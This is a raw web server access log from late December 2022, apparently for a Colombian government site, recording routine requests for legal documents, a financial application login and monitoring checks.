186.154.33.200 - - [28/Dec/2022:07:15:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/2149.pdf HTTP/1.1" 200 839353
172.22.2.4 - - [28/Dec/2022:07:14:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61323
216.245.221.92 - - [28/Dec/2022:07:16:33 -0500] "HEAD / HTTP/1.1" 200 -
114.119.130.33 - - [28/Dec/2022:07:16:51 -0500] "GET /Autoliquidacion/index.php?dir=Solicitudes%2Brelacionadas%2Bcon%2Bocupaci%C3%83%C2%83%C3%82%C2%AF%C3%83%C2%82%C3%82%C2%BF%C3%83%C2%82%C3%82%C2%BDn%2Bde%2Bcauce/&sort=size&order=asc HTTP/1.1" 200 6994
172.22.2.4 - - [28/Dec/2022:07:15:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:07:16:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54452
66.249.73.97 - - [28/Dec/2022:07:19:05 -0500] "-" 408 -
201.245.192.253 - - [28/Dec/2022:07:19:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
172.22.2.4 - - [28/Dec/2022:07:19:24 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%203%20del%2027%20de%20Mayo%20de%202011.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:19:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44109
201.245.192.253 - - [28/Dec/2022:07:20:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41255
216.245.221.92 - - [28/Dec/2022:07:21:33 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.192 - - [28/Dec/2022:07:23:11 -0500] "GET /bla/resoluciones/notificaciones/autos%202018/6399.pdf HTTP/1.1" 304 -
172.22.2.4 - - [28/Dec/2022:07:21:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.121.140.58 - - [28/Dec/2022:07:23:35 -0500] "GET /BLA/resoluciones/index.php?dir= HTTP/1.1" 200 13502
190.121.140.58 - - [28/Dec/2022:07:23:42 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 435562
172.22.2.4 - - [28/Dec/2022:07:22:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
201.245.192.253 - - [28/Dec/2022:07:24:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
101.68.211.2 - - [28/Dec/2022:07:26:10 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [28/Dec/2022:07:26:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:07:28:25 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [28/Dec/2022:07:28:28 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%203%20del%2016%20de%20Junio%20de%202011.pdf HTTP/1.1" 200 346378
172.22.2.4 - - [28/Dec/2022:07:27:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Dec/2022:07:29:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
172.22.2.4 - - [28/Dec/2022:07:28:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
201.245.192.253 - - [28/Dec/2022:07:29:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44109
201.245.192.253 - - [28/Dec/2022:07:30:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41255
216.245.221.92 - - [28/Dec/2022:07:31:33 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Dec/2022:07:34:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
172.22.2.4 - - [28/Dec/2022:07:33:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:07:34:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56825
216.245.221.92 - - [28/Dec/2022:07:36:33 -0500] "HEAD / HTTP/1.1" 200 -
181.32.8.183 - - [28/Dec/2022:07:38:40 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.32.8.183 - - [28/Dec/2022:07:38:45 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
181.32.8.183 - - [28/Dec/2022:07:38:48 -0500] "POST /appsia/controlador HTTP/1.1" 200 21045
181.32.8.183 - - [28/Dec/2022:07:38:48 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
201.245.192.253 - - [28/Dec/2022:07:38:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
201.245.192.253 - - [28/Dec/2022:07:39:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44109
201.245.192.253 - - [28/Dec/2022:07:40:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41255
186.102.46.187 - - [28/Dec/2022:07:40:19 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19xLj1k88qnnE78njt2rEd49l85EFbFpT9jtnnHjxhKJIRuTzylgaOl&y=U2FsdGVkX19Lqv9WML5XWjv/ujHLQB1fFbRf4J+KwZYY3aEULp72p3E3RtzhX10J HTTP/1.1" 200 30
186.102.46.187 - - [28/Dec/2022:07:40:20 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/D4MRaL/0O24ndQX+RU91/MZEfSH+7MCf9k4yEqxCCT0b0+b4RppUU5A0OTctLbXKiGltEiqhW0te5Z2CWYapf5zbKBqLFlCY=&u=U2FsdGVkX1+lCWScBP28bscom1OKWfOviX2z+nY4OLE=&y=U2FsdGVkX19Lqv9WML5XWjv/ujHLQB1fFbRf4J+KwZYY3aEULp72p3E3RtzhX10J HTTP/1.1" 200 97
186.102.46.187 - - [28/Dec/2022:07:40:20 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/r4PzEoJSHvjhNkhF2VJ9xM2Xrn8AK58fyck0nAueytR5epASJ4bYhMLlMphv/lMkElSjW43U4jNIBB334YtV+BG8JbPwyYAnZpnD+wBTXcWnM5Ev0jnyLiYG7Gl2qmqUw+U35uw9GbXTpCQeOzuhv1Ik2wNB/nMUYP3mmpKHOuRUEIYTrFfQzmInWiRPmVheKrYdeZb+8gA6evossyHXEuEsJ8T3sNrmgmvLfw/WM5ThAXTv9+iNLROYRGDBkai7J5QaIG9nAAM3xAARgWLKgf04WZTH8VuPFTLCgxbHvSjLHt+/EXq/Y0Epc1frsoUvVFepA0i1B6LJPd6iDFOIlxuTGjdFVEJcltvK7UCeVaTrg5tu9GILiAH+y2kw6BjpZx3zI9HHb7EPPOyH2GmDGtFcqFbjVYzYRZmV7vquyP/D00RiDwGdvRWlQJNYGCD+Sah2nTz0rD39UYQyu3JX0UyKJqO41RXhlrXyPZMAEDFPPsXlMGPj6iAuAxDGMGYZh3CdGLPL/ig/HJlPm+yhDCW/gUjlIWr8VjAlj6qM5tiiaP47Iw7MPTNTEfbtffdw13axYMEWdweb/c8LMqBn09SRa5d9tF/Qv/7StYSz/wD25Zkjnw4zsqBsBx4MR03kvUIXP3O6IkqsjRQDqIRI9K6WgQhZ5wyhswkgQz5PfcQUqDYlGHPm8m4WCK0vgMr7kpaWk+FmRVs5uUY/R1xqrpE9odQKS5X4TyPgI3pTOayJ6JKwc4nD1I1DsFB5F61XX4L6Tp5YHg+oChlcDfFK6KhPI9wWvlCTjJyxiVEp9+KzVgr0mgaUT5ykfwq8K6r/bvIy7VSxQLwEe7LsEYhGASEmSkISCOovobDYM7RrQp1Z5GfH4v2UztpEiXzjjI/F95wYfrYDqEdH+4cokY1Xe1H4YUFTpWPJ3pcwO0slXm4yzrXEEKuWU6EU/+Lho195LbE9YnSnvJo3bdcYWUkDqS5zhNGZNNcUz7ihndzuCRCtnVggIG+MT9cm6cc48sqQ1z5vWDoFppxdHb7ZQBwYwya4KprVuZI4BVV490mNjpdioRWNV6/MPccJY1OmSvLFjNYYtIz+2wrEuUd53VbhkgecZv0J4nOI96oEvxNb4NDV/C1kcPre4IjzluZkV8rugXOy8J9vujvT1zCVQjhRafrFMrk8unIq7URDq9Pvl0hUvXNBN0B+lvgQ3jmrBe81IMuy44D73M5LDDBb3a4WoLOj/UH5CFeRxQi3iWsJUArDmpDYcRDDOzYvBqNDAsvCyidvSHOMLUsOAwGwuL0laqxxjRBIj3iBXf6JQPHUofAxtcK34Z73vFR+0Jf61Tv17QK6nCcNajstzzQwNSk+fZ28OtGgMusjbHl1WZXw3EwKiVpH7eo6hyLdpxAsFAr6yTcafJEeTA7Mh15sa0437i9QUHJx9mTs=&u=U2FsdGVkX1+lCWScBP28bscom1OKWfOviX2z+nY4OLE=&y=U2FsdGVkX19Lqv9WML5XWjv/ujHLQB1fFbRf4J+KwZYY3aEULp72p3E3RtzhX10J HTTP/1.1" 200 1000
186.102.46.187 - - [28/Dec/2022:07:40:20 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18bUdJL6WFDTJkAFnkmogiQVXs9Cc3QWo8vbV+vq/fxg4SGyChrKQJUg/YXOwWs/yL8dvnVk1fgRyJYnMg5kQfiMElg5rimiGDNfB8G+UODzEa1ayOYvNHLhm1efx9hsNSOuVDgdSRuEca7uuOILJgNSF2pJywzHzYe0hnlSy8BE4xLu38CWn3J8qhmzS0yaSpT8jdQLux1xg9sOmkfYNnCam1gsbPNmnCsnQK4sS3Lwa8nfIKgfpOVgUsaF52I+BDRLgkFf18jhfFPw4oz6kGMqUYt9hwlGkN4HfEPS1CC6PQvVAwCxrFL5Q9PK9cE7NNdpqXo9FID5Q==&u=U2FsdGVkX1+lCWScBP28bscom1OKWfOviX2z+nY4OLE=&y=U2FsdGVkX19Lqv9WML5XWjv/ujHLQB1fFbRf4J+KwZYY3aEULp72p3E3RtzhX10J HTTP/1.1" 200 196
186.102.46.187 - - [28/Dec/2022:07:40:20 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX19xLj1k88qnnE78njt2rEd49l85EFbFpT9jtnnHjxhKJIRuTzylgaOl HTTP/1.1" 200 31032
172.22.2.4 - - [28/Dec/2022:07:39:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Dec/2022:07:40:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 302 -
201.245.192.253 - - [28/Dec/2022:07:40:56 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
201.245.192.253 - - [28/Dec/2022:07:40:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 302 -
201.245.192.253 - - [28/Dec/2022:07:40:56 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
201.245.192.253 - - [28/Dec/2022:07:40:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 302 -
201.245.192.253 - - [28/Dec/2022:07:40:56 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
201.245.192.253 - - [28/Dec/2022:07:40:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 302 -
201.245.192.253 - - [28/Dec/2022:07:40:57 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
201.245.192.253 - - [28/Dec/2022:07:40:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 302 -
201.245.192.253 - - [28/Dec/2022:07:40:57 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
201.245.192.253 - - [28/Dec/2022:07:40:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 302 -
201.245.192.253 - - [28/Dec/2022:07:40:57 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12508
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=85A9LJr+IIg7D0nU00FKthwg.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=85A9LJr+IIg7D0nU00FKthwg.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=85A9LJr+IIg7D0nU00FKthwg.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=85A9LJr+IIg7D0nU00FKthwg.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=85A9LJr+IIg7D0nU00FKthwg.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=85A9LJr+IIg7D0nU00FKthwg.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/faces/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12186
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:04 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:06 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 11172
201.245.192.253 - - [28/Dec/2022:07:41:06 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
201.245.192.253 - - [28/Dec/2022:07:41:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:07 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
201.245.192.253 - - [28/Dec/2022:07:41:10 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 5600
201.245.192.253 - - [28/Dec/2022:07:41:11 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 17517
201.245.192.253 - - [28/Dec/2022:07:41:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:11 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:11 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:11 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
201.245.192.253 - - [28/Dec/2022:07:41:11 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
201.245.192.253 - - [28/Dec/2022:07:41:11 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
201.245.192.253 - - [28/Dec/2022:07:41:13 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
201.245.192.253 - - [28/Dec/2022:07:41:13 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 3843
201.245.192.253 - - [28/Dec/2022:07:41:14 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 41706
201.245.192.253 - - [28/Dec/2022:07:41:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:14 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:14 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:41:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1428
216.245.221.92 - - [28/Dec/2022:07:41:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:07:39:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56825
201.245.192.253 - - [28/Dec/2022:07:42:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 113591
201.245.192.253 - - [28/Dec/2022:07:42:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:42:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:42:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:42:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.141.1.241 - - [28/Dec/2022:07:42:25 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
181.141.1.241 - - [28/Dec/2022:07:42:33 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2009%2F HTTP/1.1" 200 1694101
207.46.13.192 - - [28/Dec/2022:07:43:23 -0500] "GET /Publicaciones/2022EE83232.pdf HTTP/1.1" 404 227
181.141.1.241 - - [28/Dec/2022:07:43:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8434.pdf HTTP/1.1" 200 559694
201.245.192.253 - - [28/Dec/2022:07:43:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
201.245.192.253 - - [28/Dec/2022:07:44:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 166924
216.245.221.92 - - [28/Dec/2022:07:46:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:07:44:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.198 - - [28/Dec/2022:07:46:44 -0500] "GET /bla/resoluciones/resoluciones%201998/RESOLUCION%20239%20DE%201998.pdf HTTP/1.1" 304 -
172.22.2.4 - - [28/Dec/2022:07:45:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54100
173.252.79.1 - - [28/Dec/2022:07:48:11 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
201.245.192.253 - - [28/Dec/2022:07:48:33 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5471
201.245.192.253 - - [28/Dec/2022:07:48:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
179.32.141.41 - - [28/Dec/2022:07:49:53 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
179.32.141.41 - - [28/Dec/2022:07:49:53 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
179.32.141.41 - - [28/Dec/2022:07:49:53 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
216.245.221.92 - - [28/Dec/2022:07:51:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:07:50:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Dec/2022:07:52:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 41706
201.245.192.253 - - [28/Dec/2022:07:52:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:52:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:52:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:52:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:52:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 35048
201.245.192.253 - - [28/Dec/2022:07:52:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 35048
201.245.192.253 - - [28/Dec/2022:07:52:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1428
201.245.192.253 - - [28/Dec/2022:07:52:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1420
201.245.192.253 - - [28/Dec/2022:07:52:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1428
201.245.192.253 - - [28/Dec/2022:07:52:41 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 113035
201.245.192.253 - - [28/Dec/2022:07:52:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:52:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:52:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:52:42 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
91.232.195.110 - - [28/Dec/2022:07:52:57 -0500] "GET / HTTP/1.1" 200 319
66.249.73.97 - - [28/Dec/2022:07:53:11 -0500] "-" 408 -
172.22.2.4 - - [28/Dec/2022:07:51:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
173.252.79.13 - - [28/Dec/2022:07:53:32 -0500] "GET /images/facebook-live-ivc-MAYO27.png HTTP/1.1" 200 480404
201.245.192.253 - - [28/Dec/2022:07:53:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
201.245.192.253 - - [28/Dec/2022:07:54:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 203882
216.245.221.92 - - [28/Dec/2022:07:56:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:07:56:47 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_Sent%20Tutela%20Drumond.docx HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:57:04 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:57:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:57:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:57:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:57:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:57:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:57:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:57:05 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:57:05 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [28/Dec/2022:07:57:05 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:57:06 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12186
